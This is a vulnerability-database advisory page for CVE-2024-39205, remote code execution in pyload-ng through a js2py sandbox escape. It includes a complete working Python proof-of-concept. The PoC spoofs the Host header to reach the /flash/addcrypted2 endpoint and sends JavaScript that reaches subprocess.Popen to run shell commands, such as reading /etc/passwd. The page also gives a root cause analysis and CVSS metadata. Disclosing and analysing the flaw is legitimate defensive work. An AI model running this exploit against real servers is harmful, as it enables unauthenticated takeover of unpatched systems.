9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-39205

GHSA ID

GHSA-r9pp-r4xf-597r

EPSS Score

0.9816%

CWE

CWE-94

Published

9/9/2024

Updated

10/28/2024

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-39205

CVE-2024-39205: pyload-ng vulnerable to RCE with js2py sandbox escape

Summary

Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.

Details

js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the /flash/addcrypted2 API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.

PoC

The PoC is provided as poc.py below, you can modify the shell command it execute:

import socket
import base64
from urllib.parse import quote

host, port = input("host: "), int(input("port: "))

payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;"
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
function f() {
    return n11
}

"""

crypted_b64 = base64.b64encode(b"1234").decode()

data = f"package=pkg&crypted={quote(crypted_b64)}&jk={quote(payload)}"

request = f"""\
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:9666
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(data)}

{data}
""".encode().replace(b"\n", b"\r\n")

def main():

    s = socket.socket()
    s.connect((host, port))

    s.send(request)
    response = s.recv(1024).decode()
    print(response)

if __name__ == "__main__":
    main()

Impact

Anyone who runs the latest version (<=0.5.0b3.dev85) of pyload-ng under python3.11 or below. pyload-ng doesn't use js2py for python3.12 or above.

(GitHub Advisory)

9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-39205

GHSA ID

GHSA-r9pp-r4xf-597r

EPSS Score

0.9816%

CWE

CWE-94

Published

9/9/2024

Updated

10/28/2024

KEV Status

Technology

Python

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
pyload-ng	pip	<= 0.5.0b3.dev85

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from the /flash/addcrypted2 endpoint's use of js2py to evaluate JavaScript from the 'jk' parameter. Despite js2py's intended sandboxing (via disable_pyimport()), the CVE-2024-28397 sandbox escape allows accessing Python's subprocess.Popen through prototype pollution. The endpoint's insufficient network access controls (relying on Host header validation) and direct exposure of js2py execution to user input make this function the attack surface. The PoC demonstrates direct exploitation through this endpoint, confirming its role in the vulnerability chain.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry *ny pylo**-n* runnin* un**r pyt*on*.** or **low *r* vuln*r**l* un**r R**. *tt**k*r **n s*n* * r*qu*st *ont*inin* *ny s**ll *omm*n* *n* t** vi*tim s*rv*r will *x**ut* it imm**i*t*ly. ### **t*ils js*py **s * vuln*r**ility o* s*n**ox *s**p*

Reasoning

T** vuln*r**ility st*ms *rom t** `/*l*s*/****rypt***` *n*point's us* o* `js*py` to *v*lu*t* J*v*S*ript *rom t** 'jk' p*r*m*t*r. **spit* `js*py`'s int*n*** s*n**oxin* (vi* `*is**l*_pyimport()`), t** *V*-****-***** s*n**ox *s**p* *llows ****ssin* Pyt*o

9.8

Basic Information

Concerned about an active attack path?

CVE-2024-39205: pyload-ng vulnerable to RCE with js2py sandbox escape

Summary

Details

PoC

Impact

9.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI